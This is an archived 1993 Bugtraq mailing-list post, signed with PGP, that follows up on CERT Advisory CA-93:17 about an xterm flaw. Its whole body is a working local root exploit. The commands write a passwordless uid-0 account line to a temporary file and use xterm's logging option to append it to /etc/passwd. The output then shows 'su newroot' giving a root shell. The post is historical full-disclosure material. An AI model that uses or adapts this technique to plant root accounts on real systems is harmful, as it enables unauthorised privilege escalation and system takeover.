Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 1993_4

Bugtraq archives for 4th quarter (Oct-Dec) 1993: CERT Advisory CA-93:17

CERT Advisory CA-93:17

Peter shipley (shipleymerde.dis.org)
Tue, 16 Nov 1993 15:35:27 -0800

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Dave Hayes: "Xterm security hole"
Next in thread: bbmath.ufl.edu: "Re: CERT Advisory CA-93:17"

-----BEGIN PGP SIGNED MESSAGE-----



CERT Advisory CA-93:17 can be exploited with:

    % cat >! /tmp/fofo
    newroot::0:0:The New Superuser on the block:/:/bin/csh
    ^D

    % xterm -l -lf /etc/passwd -e cat /tmp/fofo
    % su newroot
    # whoami
    root
    # id
    uid=0(root) gid=0(wheel)




-----BEGIN PGP SIGNATURE-----
Version: 2.3a

iQBVAgUBLOljqXynuL1gkffFAQHi5QH7Be2n60igPaE6wKKAb2oR188YTuDqOLku
ltEBp7schLwVWi2YNfCP+CD1AKELvAzZ9jWzdsz+dvDW6ooMyU4bmg==
=hBaZ
-----END PGP SIGNATURE-----

Next message: Dave Hayes: "Xterm security hole"
Next in thread: bbmath.ufl.edu: "Re: CERT Advisory CA-93:17"